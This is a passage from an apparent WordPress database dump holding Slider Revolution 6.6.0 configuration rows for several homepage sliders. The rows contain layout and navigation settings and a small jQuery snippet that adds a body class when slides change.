});\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":true,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1024\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":true,\"rtl\":false,\"style\":3006,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"1\",\"offsetY\":\"37\",\"align\":\"slider\",\"space\":\"14\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(4,'Home 3','home-3','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home-3\\\\\\\"]\",\"layouttype\":\"fullscreen\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"3000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":800,\"t\":778,\"m\":480},\"height\":{\"d\":868,\"n\":768,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi4.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"#eff0ea\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":true,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"\",\"hideDelayMobile\":\"\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":true,\"hideUnderLimit\":\"1050\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"0\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":true,\"rtl\":false,\"style\":3006,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"18\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(5,'Home 4','home-4','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home-4\\\\\\\"]\",\"layouttype\":\"fullscreen\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"300\",\"delay\":\"9000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1366,\"t\":778,\"m\":480},\"height\":{\"d\":868,\"n\":768,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi5.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":\"100\",\"height\":\"50\"},\"swipe\":{\"set\":false,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":\"1\",\"velocity\":\"75\"},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":\"20\",\"offsetY\":\"0\",\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":2000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":4000,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\",\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":\"5\",\"direction\":\"horizontal\",\"height\":\"50\",\"width\":\"100\",\"widthMin\":\"100\",\"innerOuter\":\"inner\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"space\":\"5\",\"align\":\"slider\",\"padding\":\"5\",\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":false,\"rtl\":false,\"style\":3006,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"0\",\"offsetY\":\"20\",\"align\":\"slider\",\"space\":\"5\",\"hideDelay\":\"200\",\"hideDelayMobile\":\"1200\",\"hideOver\":false,\"hideOverLimit\":\"0\",\"hideUnder\":false,\"hideUnderLimit\":\"0\"}},\"troubleshooting\":{\"ignoreHeightChanges\":false,\"ignoreHeightChangesUnderLimit\":\"0\",\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":false,\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"55\"],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":\"65\"},\"mouse\":{\"speed\":\"400\",\"bgSpeed\":\"0\",\"layersSpeed\":\"0\",\"origo\":\"enterpoint\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":\"10\",\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":true,\"tilt\":\"30\",\"layers\":false},\"version\":\"6.6.0\"}','{\"version\":\"6.6.0\"}',''),(6,'Home 5','home5','{\"id\":\"\",\"shortcode\":\"[rev_slider alias=\\\\\\\"home5\\\\\\\"]\",\"layouttype\":\"fullwidth\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":\"55\",\"maxProducts\":\"30\",\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":\"1200\",\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":\"1200\",\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":\"1200\",\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":\"1200\",\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":\"1200\",\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":\"1200\",\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":\"200\",\"delay\":\"3000\",\"background\":{\"fit\":\"cover\",\"fitX\":\"100\",\"fitY\":\"100\",\"position\":\"center center\",\"positionX\":\"0\",\"positionY\":\"0\",\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":\"0\",\"blurEnd\":\"0\",\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":\"100\",\"fitStart\":\"100\",\"xEnd\":\"0\",\"yEnd\":\"0\",\"xStart\":\"0\",\"yStart\":\"0\",\"rotateStart\":\"0\",\"rotateEnd\":\"0\"}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":1920,\"n\":1441,\"t\":778,\"m\":480},\"height\":{\"d\":725,\"n\":600,\"t\":880,\"m\":700},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"javascript\":\"(function($){\\n $(document).ready(function(){\\n revapi6.bind(\'revolution.slide.onchange\', function(e, data) {\\n $(\'body\').addClass(\'qodef-rev-slider-loaded\');\\n });\\n });\\n})(jQuery);\",\"css\":\"\"},\"carousel\":{\"borderRadius\":\"0\",\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":\"3\",\"maxRotation\":\"0\",\"paddingTop\":\"0\",\"paddingBottom\":\"0\",\"rotation\":false,\"scaleDown\":50,\"space\":\"0\",\"speed\":\"800\",\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":\"-1\"},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":\"0\",\"dottedOverlay\":\"none\",\"shadow\":\"0\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"-1\"},\"position\":{\"marginTop\":\"0\",\"marginBottom\":\"0\",\"marginLeft\":\"0\",\"marginRight\":\"0\",\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"0\",\"hideAllLayersUnderLimit\":\"0\",\"hideSliderUnderLimit\":\"0\"},\"general\":{\"slideshow\":{\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":\"0\",\"stopAtSlide\":\"2\",\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"20%\",\"presetSliderHeight\":false,\"initDelay\":\"0\",\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":false,\"height\":\"5\",\"position\":\"top\",\"color\":\"rgba(0,0,0,0.15)\"},\"firstSlide\":{\"set\":false,\"duration\":\"300\",\"slotAmount\":\"7\",\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1